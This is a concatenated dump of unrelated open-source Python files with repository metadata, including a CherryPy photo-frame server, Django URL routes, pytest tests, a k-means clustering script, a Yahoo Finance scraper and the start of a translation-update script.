9c42d50f0f0b0b1619ddb3499c1f61feff741ba5 | 5453391441c10fa474a565bbb044b9448e8aeda5 | /tests/invalid_snippets/semicolon.py | 8fa9fe5ceefbb9151fa838e44046eadb163611b7 | [] | permissive | deeplook/pyteen | 9778f3d510c8a6e3052566c5d7994797c20c855e | dc1b2e430d8ce0528544f1cf8dc8c6c1b1acc2ef | refs/heads/master | 2022-12-15T14:33:31.507934 | 2020-07-22T17:19:52 | 2020-09-06T14:11:43 | 281,739,027 | 2 | 0 | MIT | 2020-08-09T21:17:17 | 2020-07-22T17:16:01 | Python | UTF-8 | Python | false | false | 135 | py | # This is invalid because it has semicolon(s).
# The following comment is to make "black" skip any reformating:
# fmt: off
pass; pass
| [
"gherman@darwin.in-berlin.de"
] | gherman@darwin.in-berlin.de |
2b2c376870f94639e8fbc6fbeeed5da072e92f03 | 8ee93a9093150e6b1984e4630c17eaf3d948ee87 | /server.py | e4260daaff217d71edd612fe9cb5ad81e7d90d9c | [] | no_license | bensalkield/Photo-Frame-Controller | 7ecb2be0166919f46ed639a586fc513190083775 | 4c64cea107d64cf0b0a07aa42ce55332795cf4bb | refs/heads/master | 2020-07-15T01:25:25.969482 | 2019-08-30T19:48:25 | 2019-08-30T19:48:25 | 205,447,260 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,732 | py | import cherrypy
import os.path
import time
import subprocess
from os import listdir
from jinja2 import Template
import sys
def load_template(path):
with open(path, 'r') as f:
return Template(f.read())
def display_photos(path):
photos = [os.path.join(path, f) for f in listdir(path) if os.path.isfile(os.path.join(path, f))]
return subprocess.Popen(['feh','-D','3','-F','--zoom','max'] + photos)
# Terminates the process responsible for displaying photos
def terminate_photos(popen):
popen.terminate()
def test():
pass
class PhotoFrame:
album_photos = None
@cherrypy.expose
def index(self, album=None):
username = "Ben"
output = load_template("./templates/index.html")
if album != None:
album_display = os.path.join(album_path, album)
print(album_display)
if self.album_photos != None:
# Kill the running album
terminate_photos(self.album_photos)
print("test")
self.album_photos = display_photos(album_display)
else:
self.album_photos = display_photos(album_display)
album_list = listdir(album_path)
print(album_list)
return output.render(username=username, album_list=album_list)
if __name__ == '__main__':
if len(sys.argv) == 1:
print("You must supply the album location.")
sys.exit()
else:
album_path = sys.argv[1]
cherrypy.server.socket_host = 'localhost'
configfile = os.path.join(os.path.dirname(__file__),'server.conf')
cherrypy.quickstart(PhotoFrame(),config=configfile)
| [
"benjaminsalkield@benstation.connect"
] | benjaminsalkield@benstation.connect |
a7eaaf704b1ca43d729d3db96987a74947dc2a7e | ac42f1d918bdbd229968cea0954ed75250acd55c | /admin/dashboard/openstack_dashboard/dashboards/admin/networks/urls.py | 4cd1b60079c3d722609128d7ad46956075f117f1 | [
"Apache-2.0"
] | permissive | naanal/product | 016e18fd2f35608a0d8b8e5d2f75b653bac7111a | bbaa4cd60d4f2cdda6ce4ba3d36312c1757deac7 | refs/heads/master | 2020-04-03T22:40:48.712243 | 2016-11-15T11:22:00 | 2016-11-15T11:22:00 | 57,004,514 | 1 | 1 | null | null | null | null | UTF-8 | Python | false | false | 2,206 | py | # Copyright 2012 NEC Corporation
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
from django.conf.urls import include
from django.conf.urls import url
from openstack_dashboard.dashboards.admin.networks.agents \
import views as agent_views
from openstack_dashboard.dashboards.admin.networks.ports \
import urls as port_urls
from openstack_dashboard.dashboards.admin.networks.ports \
import views as port_views
from openstack_dashboard.dashboards.admin.networks.subnets \
import urls as subnet_urls
from openstack_dashboard.dashboards.admin.networks.subnets \
import views as subnet_views
from openstack_dashboard.dashboards.admin.networks import views
NETWORKS = r'^(?P<network_id>[^/]+)/%s$'
urlpatterns = [
url(r'^$', views.IndexView.as_view(), name='index'),
url(r'^create/$', views.CreateView.as_view(), name='create'),
url(NETWORKS % 'update', views.UpdateView.as_view(), name='update'),
url(NETWORKS % 'detail', views.DetailView.as_view(), name='detail'),
url(NETWORKS % 'agents/add',
agent_views.AddView.as_view(), name='adddhcpagent'),
url(NETWORKS % 'subnets/create',
subnet_views.CreateView.as_view(), name='addsubnet'),
url(NETWORKS % 'ports/create',
port_views.CreateView.as_view(), name='addport'),
url(r'^(?P<network_id>[^/]+)/subnets/(?P<subnet_id>[^/]+)/update$',
subnet_views.UpdateView.as_view(), name='editsubnet'),
url(r'^(?P<network_id>[^/]+)/ports/(?P<port_id>[^/]+)/update$',
port_views.UpdateView.as_view(), name='editport'),
url(r'^subnets/', include(subnet_urls, namespace='subnets')),
url(r'^ports/', include(port_urls, namespace='ports')),
]
| [
"rajagopalx@gmail.com"
] | rajagopalx@gmail.com |
478e33139e3bc44a7eca1b0d21226643e584e4a6 | bf0bf48bf94672c952a204c9a74c1b508a898293 | /tests/test_nnrf.py | 2bd5b17a920ef10b64c3a6650b715263842daea9 | [
"BSD-3-Clause"
] | permissive | paradoxysm/nnrf | dcb9b7e764275841ace606b56f7ba2f260bac226 | 4d83e7c03dffd564d6856ff963c7aa85bb96c73c | refs/heads/master | 2022-08-02T12:32:42.315918 | 2020-05-22T02:16:35 | 2020-05-22T02:16:35 | 262,668,598 | 2 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,621 | py | import pytest
import numpy as np
from sklearn.datasets import load_breast_cancer, load_iris
from nnrf import NNRF
dataset = load_breast_cancer()
data = dataset['data']
data = (data - np.mean(data, axis=0)) / np.std(data, axis=0)
min, max = data.min(axis=0), data.max(axis=0)
data = (data - min) / (max - min)
target = dataset['target']
partition = int(0.8 * len(data))
train_X_bc = data[:partition]
train_Y_bc = target[:partition]
test_X_bc = data[partition:]
test_Y_bc = target[partition:]
dataset = load_iris()
data = dataset['data']
data = (data - np.mean(data, axis=0)) / np.std(data, axis=0)
min, max = data.min(axis=0), data.max(axis=0)
data = (data - min) / (max - min)
target = dataset['target']
partition = int(0.8 * len(data))
train_X_iris = data[:partition]
train_Y_iris = target[:partition]
test_X_iris = data[partition:]
test_Y_iris = target[partition:]
@pytest.mark.parametrize("params", [
({'n':3}),
({'n':3, 'd':3, 'r':'log2'}),
({'n':3, 'loss':'mse'}),
({'n':3, 'optimizer':'sgd'}),
({'n':3, 'regularize':'l2'})
])
class TestNNRF:
def test_nnrf_binary(self, params):
nnrf = NNRF(**params)
nnrf.fit(train_X_bc, train_Y_bc)
def test_nnrf_multi(self, params):
nnrf = NNRF(**params)
nnrf.fit(train_X_iris, train_Y_iris)
def test_nnrf_predict_binary(self, params):
nnrf = NNRF(**params)
nnrf.fit(train_X_bc, train_Y_bc)
nnrf.predict(test_X_bc)
def test_nnrf_predict_multi(self, params):
nnrf = NNRF(**params)
nnrf.fit(train_X_iris, train_Y_iris)
nnrf.predict(test_X_iris)
def test_nnrf_unfit():
nnrf = NNRF()
with pytest.raises(RuntimeError):
nnrf.predict(test_X_bc)
| [
"jeffreyc.wang@mail.utoronto.ca"
] | jeffreyc.wang@mail.utoronto.ca |
7b988acb4a602789c8db156a458b749d69b1e0fa | d7824dc42ac64fcc3c785fed8ff2c7d287945456 | /setup.py | 802d0923ba1d755c679baca4d67114deb6a06777 | [] | no_license | astrosat/dat-utils | 363f262ad366ce18c4db7f666d5d6a58b1880502 | 5bee23c0a3e76b786aaf53e36ad3222a36c6f11c | refs/heads/master | 2023-04-25T21:58:40.016488 | 2021-05-26T12:38:13 | 2021-05-26T12:38:13 | 239,556,126 | 0 | 0 | null | 2021-05-26T12:38:14 | 2020-02-10T16:19:01 | Python | UTF-8 | Python | false | false | 1,214 | py | import os
from setuptools import find_packages, find_namespace_packages, setup
with open(os.path.join(os.path.dirname(__file__), "README.md")) as readme:
README = readme.read()
# allow setup.py to be run from any path
os.chdir(os.path.normpath(os.path.join(os.path.abspath(__file__), os.pardir)))
# dynamically compute the version, etc....
author = __import__("dat_utils").__author__
title = __import__("dat_utils").__title__
version = __import__("dat_utils").__version__
install_requires = ["pyjwt~=2.1.0"]
setup(
name=title,
version=version,
author=author,
url="https://github.com/astrosat/dat-utils",
description="Data Access Token Utilities",
long_description=README,
long_description_content_type="text/markdown",
install_requires=install_requires,
packages=find_packages(exclude=["example"]),
include_package_data=True,
classifiers=[
"Intended Audience :: Developers",
"Operating System :: OS Independent",
"Programming Language :: Python",
"Programming Language :: Python :: 3.5",
"Programming Language :: Python :: 3.6",
"Programming Language :: Python :: 3.7",
],
python_requires=">=3.5",
)
| [
"allyn.treshansky@gmail.com"
] | allyn.treshansky@gmail.com |
881d43562a8e3903e35292bc3823831af8a8f2b3 | 43ef9e99db7596655cc9e726800ddc3efc2ddff1 | /AscendingPattern.py | fdf3b332573855a7ca9acbd809f67f129ae6d5b2 | [] | no_license | sikinder/Python-Projects | 790da09e72428daa2ad2c0280d257eef0da64afc | 58bea1f604f0253aceff18a2bede8f5ff6c759e2 | refs/heads/master | 2021-06-23T17:12:32.228287 | 2021-01-22T15:30:41 | 2021-01-22T15:30:41 | 183,131,442 | 0 | 0 | null | 2019-04-24T02:54:48 | 2019-04-24T02:27:02 | Python | UTF-8 | Python | false | false | 177 | py | lines = int(input("Enter lines for pyramid: "))
space = " "
star = "* "
for i in range(0,lines+1):
print((lines+1)*space, end = '')
print(i*star)
lines = lines - 1
| [
"sikinderbaig@gmail.com"
] | sikinderbaig@gmail.com |
a1c5733dbc7160a32ce830d02b4fdf2f96a3a2fa | cab96d3588f188e22798ddfd43ec153b7f472a2a | /code/wkmeans/main.py | 86e17afd3535d0f8bce899aaabffcb5818c398a5 | [] | no_license | aligator4sah/TAME | 79308b41ffa5a9e5ae5df5376942a769612a591b | a1fe28d997fb463d5ad9c85b7aee7cebbbb89f29 | refs/heads/master | 2023-08-19T06:21:50.738544 | 2020-12-17T01:33:01 | 2020-12-17T01:33:01 | 680,073,183 | 0 | 0 | null | 2023-08-18T09:22:10 | 2023-08-18T09:22:05 | null | UTF-8 | Python | false | false | 2,324 | py | # coding=utf8
import sys
reload(sys)
sys.setdefaultencoding('utf8')
import os
import sys
sys.path.append('../tools')
sys.path.append('../imputation')
import copy
import time
import numpy as np
from sklearn import metrics
from sklearn.cluster import spectral_clustering
import random
import json
from glob import glob
from collections import OrderedDict
from tqdm import tqdm
from multiprocessing import Process, Pool
from sklearn.manifold import TSNE
import matplotlib.pyplot as plt
import parse, py_op
args = parse.args
inf = 100000000.0
def compute_weight(dist_mat, groups):
weights = []
for g in groups:
dist_g = dist_mat[g][:, g]
dist_avg = dist_g.mean(0)
w = 1 / (1 + np.exp(dist_avg))
w = w / w.sum()
weights.append(w)
return weights
def wkmeans_epoch(dist_mat, groups):
assert dist_mat.min() >= 0
weights = compute_weight(dist_mat, groups)
cluster_dist = []
for ig,g in enumerate(groups):
dist = dist_mat[g]
w = weights[ig]
dist_avg = np.dot(w, dist)
cluster_dist.append(dist_avg)
new_groups = [[] for _ in groups]
for i in range(len(dist_mat)):
dist_i = [d[i] for d in cluster_dist]
mind = min(dist_i)
new_groups[dist_i.index(mind)].append(i)
groups = new_groups
return groups
def wkmeans(n_cluster):
subtyping_dir = os.path.join(args.result_dir, args.dataset, 'subtyping')
hadm_id_list = py_op.myreadjson(os.path.join(subtyping_dir, 'hadm_id_list.json'))
hadm_dist_matrix = np.load(os.path.join(subtyping_dir, 'hadm_dist_matrix.npy'))
assert len(hadm_dist_matrix) == len(hadm_id_list)
# initialization
indices = range(len(hadm_id_list))
np.random.shuffle(indices)
init_groups = [indices[i*10: i*10 + 10] for i in range(n_cluster)]
groups = init_groups
for epoch in range(100):
groups = wkmeans_epoch(hadm_dist_matrix, groups)
print([len(g) for g in groups])
if epoch and epoch % 10 == 0:
cluster_results = []
for g in groups:
cluster_results.append([hadm_id_list[i] for i in g])
py_op.mywritejson(os.path.join(subtyping_dir, 'cluster_results.json'), cluster_results)
def main():
wkmeans(args.nc)
if __name__ == '__main__':
main()
| [
"1094990538@qq.com"
] | 1094990538@qq.com |
3b09f9cd2a8533357819a76a96b46897eb6cbcd3 | 7939b7ab91519d1f88656847174207a76ee4c1d5 | /Python Programs Fall 2018 /Assignments/M6-A6/testBankAccount.py | f79baa223e305a4df9c3adcee3746f0720a85d31 | [] | no_license | eliefrancois/Python | 832d8f9a66a9f7d93d6bf153ac71cad9f1c6691f | f5ac08caaeecdb1d4f347451be33a8314ebc9d06 | refs/heads/master | 2020-08-08T05:03:14.486647 | 2019-10-08T18:48:24 | 2019-10-08T18:48:24 | 213,724,866 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 297 | py | import bankAccount
import datetime
myObject = bankAccount.bankAccount(123456,10000,2.5,datetime.datetime.today())
myObject.withdraw(3500)
myObject.deposit(500)
print(myObject.getBalance())
print(myObject.getMonthlyInterest())
print(myObject.getDateCreated().strftime("%a %b %d %H:%M:%S %Z %Y"))
| [
"noreply@github.com"
] | eliefrancois.noreply@github.com |
e6189bce06455473f3b957791389e8dc1850167b | 197c7d084aec186c0335637b005a4dc99bb18e3a | /initial/singly_linked_list/singly_linked_list.py | 957ae5688219659f6c0a908b10944c21bfddffec | [] | no_license | Aszalea-Calderon/cs-py-data-structures | 521bda53c6bf2af11104093de0c3f3b3d41b43e2 | abbe10c85d85d078bc316019434f39da00dbcf85 | refs/heads/main | 2023-03-05T06:40:14.302740 | 2021-02-08T18:55:59 | 2021-02-08T18:55:59 | 337,243,989 | 0 | 0 | null | 2021-02-09T00:01:36 | 2021-02-09T00:01:35 | null | UTF-8 | Python | false | false | 2,109 | py | class Node:
"""
A class representation of a DoublyLinkedList Node.
Each Node will store
(1) a value (could be of any type) and
(2) a reference to the next_node Node in list.
"""
def __init__(self, value):
self.value = value
self.next = None
def __repr__(self):
return f"Node({self.value}"
class LinkedList:
"""
A class representation of a Singly-Linked-List.
Stores a reference to
(1) the head (first node in list) and
(2) the tail (last node in list).
Each item in list will be an instance of class Node (defined above) and
each node instance will store a value and a reference to the next_node Node in list.
"""
def __init__(self):
"""
Constructs a new instance of a DoublyLinkedList
"""
# NOTE: Nothing to do in here right now
self.head = None
self.tail = None
def add_to_head(self, value):
"""
Adds a Node with the given value to the beginning of the list
:param value: the value to store at the beginning of the list
:return: None
"""
# TODO: IMPLEMENT THIS METHOD
# Please note that the value coming in is NOT an instance of the Node class
###############################
# wrap the given value in a Node and insert it as the new head of the list
###############################
pass
def add_to_tail(self, value):
"""
Adds a Node with the given value to the end of the list
:param value: the value to store at the end of the list
:return: None
"""
# TODO: IMPLEMENT THIS METHOD
pass
def remove_head(self):
"""
Remove the item at the beginning of the list.
:return: The value of the item being removed
"""
# TODO: IMPLEMENT THIS METHOD
pass
def remove_tail(self):
"""
Remove the item at the end of the list.
:return: The value of the item being removed
"""
# TODO: IMPLEMENT THIS METHOD
pass
| [
"chaz-kiker@lambdastudents.com"
] | chaz-kiker@lambdastudents.com |
c88ac0275bde4912997ca35567020060cd5e0c47 | a8b678342127aff21759b5b877d00c94234f7f7e | /Module.py | 26ca99ebb7222221b8e5dd36078f0c74b8040016 | [] | no_license | sonkute96/hocPython | 099c6909b64f8f49e19ec7586d95ef3588bcd2e5 | bba1e90dbe8fd12ed4632a06f3c3815ea12d0988 | refs/heads/master | 2021-01-25T00:55:55.369391 | 2017-06-18T15:48:15 | 2017-06-18T15:48:15 | 94,696,877 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 245 | py | class Song(object):
def __init__(self, lyrics):
self.lyrics = lyrics
def sing_me_a_song(self):
for line in self.lyrics:
print line
happy_bday = Song(["happy birthday","hello son"])
happy_bday.sing_me_a_song()
| [
"phamson@Phams-MacBook-Pro.local"
] | phamson@Phams-MacBook-Pro.local |
8b1336a8a8e9dcca112c2c475884faf365aae111 | 852dae69fda38885bc87efa3f30fc5244ba10896 | /Documents/pythoncode/webscrapping_prax.py | 8acfddb24dbbff7b7ce535d73f965d00763e3895 | [] | no_license | brandon-todd/alien_invasion_game | 5c9bb6d5fd2e570ee1e01e16854d2aad6c8cce10 | c1c2ade8ad17fd37e5d4193251e313cca16903bc | refs/heads/master | 2023-03-15T01:51:02.941347 | 2021-03-18T20:11:54 | 2021-03-18T20:11:54 | 337,286,748 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,616 | py | from selenium.webdriver.common.keys import Keys
from selenium.webdriver.common.by import By
from selenium.webdriver.support.ui import WebDriverWait
from selenium.webdriver.support import expected_conditions as EC
import json
import selenium
from selenium import webdriver
import time
import io
import schedule
import time
stock_history = {}
def stocks_check(t):
print("I'm working...")
PATH = 'C:\Program Files (x86)\chromedriver.exe'
driver = webdriver.Chrome(PATH)
url = 'https://finance.yahoo.com/most-active'
driver.get(url.format(q='Car'))
try:
change = WebDriverWait(driver, 10).until(
EC.presence_of_element_located((By.CSS_SELECTOR,"[aria-label='Change']"))
)
names = WebDriverWait(driver, 10).until(
EC.presence_of_element_located((By.CSS_SELECTOR,"[aria-label='Name']"))
)
Companies = driver.find_elements_by_css_selector("[aria-label='Name']")
changes = driver.find_elements_by_css_selector("[aria-label='Change']")
lst1 = [i.text for i in Companies]
lst2 = [i.text for i in changes]
except:
driver.quit()
for i in range(0, len(lst1)):
if lst1[i] not in list(stock_history.keys()):
stock_history.update({lst1[i]:[lst2[i]]})
else:
stock_history[lst1[i]].append(lst2[i])
print(stock_history)
with open('data.txt', 'a') as outfile:
json.dump(stock_history, outfile)
return "done"
schedule.every().day.at("08:58").do(stocks_check,'It is 08:58')
while True:
schedule.run_pending()
time.sleep(30)
| [
"brandon-todd@users.noreply.github.com"
] | brandon-todd@users.noreply.github.com |
05edffa7e780d484e73b82f8ab0728af5e752681 | abbe7809ab9c3915b40e67f87dd5ff109a0bfa75 | /Curso em vídeo/Ex 009 - tabuada.py | e886040a4baf5a03dd2a58127b02140cce9c21f9 | [
"MIT"
] | permissive | Ianashh/Python-Testes | 0c3428a6195d9fbaff6c03a244faf0bbb35f6004 | 83d9e2775833272279b52320f141d759ec952858 | refs/heads/main | 2023-07-22T10:38:22.662317 | 2021-09-02T06:41:50 | 2021-09-02T06:41:50 | 381,902,779 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 671 | py | n = int(input('Digite um numero para ver sua tabuada: '))
cores = {'limpa':'\033[m',
'vermelho':'\033[31m',
'verde':'\033[32m',
'amarelo':'\033[33m',
'azul':'\033[34m',
'lilas':'\033[35m',
'ciano':'\033[36m'}
formatação = {'negrito':'\033[1m',
'sublinhado':'\033[4m'}
print('_' *15)
print('{}{}{} x 01 = {} \n{} x 02 = {} \n{} x 03 = {} \n{} x 04 = {} \n{} x 05 = {} \n{} x 06 = {} \n{} x 07 = {} \n{} x 08 = {} \n{} x 09 = {} \n{} x 10 = {}{}'
.format(formatação['sublinhado'],cores['verde'],n, n*1,n, n*2,n, n*3,n, n*4,n, n*5,n, n*6,n, n*7,n, n*8,n, n*9,n, n*10,cores['limpa']))
print('_' *15) | [
"82633785+Ianashh@users.noreply.github.com"
] | 82633785+Ianashh@users.noreply.github.com |
3ca35f3537a824472f63b7833626c34abcf1e3e6 | befafdde28c285c049b924fa58ce6240a4ae8d3c | /python_solution/Backtracking/40_CombinationSumII.py | 3c2f5d5b703d0d38f2bbe30c891c104f20adad1e | [] | no_license | Dimen61/leetcode | 3364369bda2255b993581c71e2b0b84928e817cc | 052bd7915257679877dbe55b60ed1abb7528eaa2 | refs/heads/master | 2020-12-24T11:11:10.663415 | 2017-08-15T14:54:41 | 2017-08-15T14:54:41 | 73,179,221 | 4 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,530 | py | class Solution(object):
def combinationSum2(self, candidates, target):
"""
:type candidates: List[int]
:type target: int
:rtype: List[List[int]]
"""
enable_lst = [False for i in range(target+1)]
enable_lst[0] = True
candidates.sort()
for i in range(target):
if enable_lst[i]:
for num in candidates:
if i+num <= target:
enable_lst[i+num] = True
if not enable_lst[target]: return []
tmp_result = []
def search(total, index, combs):
"""
:type total: int
:type index: int
:rtype: void
"""
if total == 0:
tmp_result.append(combs)
return
elif index >= len(candidates) or total < 0:
return
num = candidates[index]
if total-num >= 0 and enable_lst[total-num]:
search(total-num, index+1, combs+[num])
search(total, index+1, combs)
search(target, 0, [])
tmp_result.sort()
result = []
last = None
for item in tmp_result:
if not last:
last = item
result.append(item)
else:
if last != item:
last = item
result.append(item)
return result | [
"dimen61@gmail.com"
] | dimen61@gmail.com |
ab2af8fd45aea04162d59882a3ea970e181727bc | 7bcb08ac43dc6eaca141a0259c33d057d3ec8fd4 | /app.py | 7f7abde535203b00bc2bc0af799b1197ab241215 | [
"MIT"
] | permissive | Salvador1994/Sistema_Bottle | 133a585fd69a8797eb92ec98d978b6d7d15f5f4b | 4ff8a39e7e7f5cf678070cf00e38b05ad2ced654 | refs/heads/master | 2020-04-03T10:32:57.655145 | 2018-10-29T11:13:39 | 2018-10-29T11:13:39 | 155,196,193 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,679 | py | from bottle import route, run
from bottle import request, template
from bottle import static_file, get
from bottle import error
import os
# static routes
@get('/<filename:re:.*\.css>')
def stylesheets(filename):
return static_file(filename, root='static/css')
@get('/<filename:re:.*\.js>')
def javascripts(filename):
return static_file(filename, root='static/js')
@get('/<filename:re:.*\.(jpg|png|gif|ico)>')
def images(filename):
return static_file(filename, root='static/img')
@get('/<filename:re:.*\.(eot|ttf|woff|svg)>')
def fonts(filename):
return static_file(filename, root='static/fonts')
@route('/login') # @get('/login')
def login():
return template('login')
def check_login(username, password):
dic = {'marcos':'python', 'Salvador Bila':'java'}
if username in dic.keys() and dic[username] == password:
return True
return False
@route('/')
def index():
return template('index')
@route('/index')
def index():
return template('index')
@route('/login', method='POST') # @post('/login')
def acao_login():
username = request.forms.get('username')
password = request.forms.get('password')
if check_login(username, password):
return template('Area_Administrativa', sucesso=check_login(username, password), nome=username)
else:
return template('verificacao_login', sucesso=check_login(username, password), nome=username)
@error(404)
def error404(error):
return template('pagina404')
if __name__ == '__main__':
if os.environ.get('APP_LOCATION') == 'heroku':
run(host='0.0.0.0',port=int(os.environ.get('PORT', 5000)))
else:
run(host='localhost', port=8080, debug=True, reloader=True) | [
"noreply@github.com"
] | Salvador1994.noreply@github.com |
2cfaa7079668d65dafd05f8f281097e1876581ab | 9a7f865d0128319183cb43b05fbbb76d2366a1c9 | /sluggen/migrations/0001_initial.py | e0cc4cf0130f8e914ced082f1a2dec4c107784fe | [
"MIT"
] | permissive | colonoh/longcat | 5bed18237c78e76222126e90ae16706b4dec9070 | d5d6044517b36a1e48ba79836ddb43793da0f91b | refs/heads/master | 2021-10-08T05:50:49.844173 | 2020-04-24T05:58:09 | 2020-04-24T05:58:09 | 253,127,249 | 0 | 0 | MIT | 2021-09-22T18:50:13 | 2020-04-05T00:43:12 | Python | UTF-8 | Python | false | false | 829 | py | # Generated by Django 3.0.5 on 2020-04-12 01:47
from django.db import migrations, models
class Migration(migrations.Migration):
initial = True
dependencies = [
]
operations = [
migrations.CreateModel(
name='Slug',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('created_at', models.DateTimeField(auto_now_add=True, verbose_name='date created')),
('url', models.URLField(verbose_name='original version of the URL')),
('slug', models.SlugField(max_length=7, verbose_name='shortened version of the URL')),
('hits', models.PositiveIntegerField(default=0, verbose_name='number of visitors to this slug')),
],
),
]
| [
"steve.j.warner@gmail.com"
] | steve.j.warner@gmail.com |
68ea54b45f3ec24b7664171fa63a5404d46fb985 | e7143b374352cf06d2ac020bff7072563e7f99e1 | /rr.py | ceddb020257b4f88e59d7b21cdcdc593e6751623 | [] | no_license | zhouguangying1/test | 3373bc2c8537ec6af56028ce3aa3230c54b1e319 | b76004b5de0e835a269278db715536f54252dee4 | refs/heads/master | 2022-12-30T01:10:57.615909 | 2020-10-18T09:56:29 | 2020-10-18T09:56:29 | 305,017,567 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 21 | py | print('test4444444')
| [
"394973674@qq.com"
] | 394973674@qq.com |
6ca24cbab5b079882c41eb88ffe91a506f7f9f9b | 4e3231ea01eeb45d2e357841a1874c68bce5fdb9 | /number_guess.py | c265efeff97eaa938a2eddec1f1b6050bd3e8f1d | [] | no_license | J4Jeffort/Jeffort | 85fbad0f583a3e9be767777a2b6feae9415174e4 | 027bcff69a2ea78434184fc2f07951e649c803b4 | refs/heads/main | 2023-03-13T19:48:04.543359 | 2021-03-06T05:45:38 | 2021-03-06T05:45:38 | 324,704,897 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,414 | py | from random import randint
from number_guess_art import logo
easy = 10
hard = 5
#Function to check user's guess against actual answer.
def check_answer(guess, answer, turns):
"""checks answer against guess. Returns the number of turns remaining."""
if guess > answer:
print("Too high...")
return turns - 1
elif guess < answer:
print("Too low...")
return turns - 1
else:
print(f"You got it! The answer was {answer}.")
#Make function to set difficulty.
def set_difficulty():
level = input("Choose a difficulty. Type 'easy' or 'hard': ")
if level == "easy":
return easy
else:
return hard
def game():
print(logo)
#Choosing a random number between 1 and 100.
print("Welcome to 0 to 100 real quick!")
print("I'm thinking of a number between 1 and 100.")
answer = randint(1, 100)
turns = set_difficulty()
#Repeat the guessing functionality if they get it wrong.
guess = 0
while guess != answer:
print(f"You have {turns} attempts remaining to guess the number.")
#Let the user guess a number.
guess = int(input("Make a guess: "))
#Track the number of turns and reduce by 1 if they get it wrong.
turns = check_answer(guess, answer, turns)
if turns == 0:
print("You've run out of guesses, you lose.")
return
elif guess != answer:
print("Guess again.")
game()
| [
"noreply@github.com"
] | J4Jeffort.noreply@github.com |
2ac8a07f272d1eb7508a454f238f56c51236845b | 5f918e33bd1bf13b74b0bf36e8b56d4599fef719 | /contrib/devtools/update-translations.py | ea23131b5a7733fb1f95e0a0fa2637caf38662c4 | [
"MIT"
] | permissive | RareShares/RareShares | 37cfc84993813b62d92467490cb0f23f0ad25d98 | 106421188cf0feee76f364e205eeb9d4ea32e99e | refs/heads/master | 2021-01-25T14:22:23.509429 | 2018-03-10T13:41:26 | 2018-03-10T13:41:26 | 123,686,817 | 0 | 1 | null | null | null | null | UTF-8 | Python | false | false | 7,664 | py | #!/usr/bin/python
# Copyright (c) 2014 Wladimir J. van der Laan
# Distributed under the MIT software license, see the accompanying
# file COPYING or http://www.opensource.org/licenses/mit-license.php.
'''
Run this script from the root of the repository to update all translations from
transifex.
It will do the following automatically:
- fetch all translations using the tx tool
- post-process them into valid and committable format
- remove invalid control characters
- remove location tags (makes diffs less noisy)
TODO:
- auto-add new translations to the build system according to the translation process
'''
from __future__ import division, print_function
import subprocess
import re
import sys
import os
import io
import xml.etree.ElementTree as ET
# Name of transifex tool
TX = 'tx'
# Name of source language file
SOURCE_LANG = 'rareshares_en.ts'
# Directory with locale files
LOCALE_DIR = 'src/qt/locale'
# Minimum number of messages for translation to be considered at all
MIN_NUM_MESSAGES = 10
def check_at_repository_root():
if not os.path.exists('.git'):
print('No .git directory found')
print('Execute this script at the root of the repository', file=sys.stderr)
exit(1)
def fetch_all_translations():
if subprocess.call([TX, 'pull', '-f', '-a']):
print('Error while fetching translations', file=sys.stderr)
exit(1)
def find_format_specifiers(s):
'''Find all format specifiers in a string.'''
pos = 0
specifiers = []
while True:
percent = s.find('%', pos)
if percent < 0:
break
try:
specifiers.append(s[percent+1])
except:
print('Failed to get specifier')
pos = percent+2
return specifiers
def split_format_specifiers(specifiers):
'''Split format specifiers between numeric (Qt) and others (strprintf)'''
numeric = []
other = []
for s in specifiers:
if s in {'1','2','3','4','5','6','7','8','9'}:
numeric.append(s)
else:
other.append(s)
# numeric (Qt) can be present in any order, others (strprintf) must be in specified order
return set(numeric),other
def sanitize_string(s):
'''Sanitize string for printing'''
return s.replace('\n',' ')
def check_format_specifiers(source, translation, errors, numerus):
source_f = split_format_specifiers(find_format_specifiers(source))
# assert that no source messages contain both Qt and strprintf format specifiers
# if this fails, go change the source as this is hacky and confusing!
#assert(not(source_f[0] and source_f[1]))
try:
translation_f = split_format_specifiers(find_format_specifiers(translation))
except IndexError:
errors.append("Parse error in translation for '%s': '%s'" % (sanitize_string(source), sanitize_string(translation)))
return False
else:
if source_f != translation_f:
if numerus and source_f == (set(), ['n']) and translation_f == (set(), []) and translation.find('%') == -1:
# Allow numerus translations to omit %n specifier (usually when it only has one possible value)
return True
errors.append("Mismatch between '%s' and '%s'" % (sanitize_string(source), sanitize_string(translation)))
return False
return True
def all_ts_files(suffix=''):
for filename in os.listdir(LOCALE_DIR):
# process only language files, and do not process source language
if not filename.endswith('.ts'+suffix) or filename == SOURCE_LANG+suffix:
continue
if suffix: # remove provided suffix
filename = filename[0:-len(suffix)]
filepath = os.path.join(LOCALE_DIR, filename)
yield(filename, filepath)
FIX_RE = re.compile(b'[\x00-\x09\x0b\x0c\x0e-\x1f]')
def remove_invalid_characters(s):
'''Remove invalid characters from translation string'''
return FIX_RE.sub(b'', s)
# Override cdata escape function to make our output match Qt's (optional, just for cleaner diffs for
# comparison, disable by default)
_orig_escape_cdata = None
def escape_cdata(text):
text = _orig_escape_cdata(text)
text = text.replace("'", ''')
text = text.replace('"', '"')
return text
def postprocess_translations(reduce_diff_hacks=False):
print('Checking and postprocessing...')
if reduce_diff_hacks:
global _orig_escape_cdata
_orig_escape_cdata = ET._escape_cdata
ET._escape_cdata = escape_cdata
for (filename,filepath) in all_ts_files():
os.rename(filepath, filepath+'.orig')
have_errors = False
for (filename,filepath) in all_ts_files('.orig'):
# pre-fixups to cope with transifex output
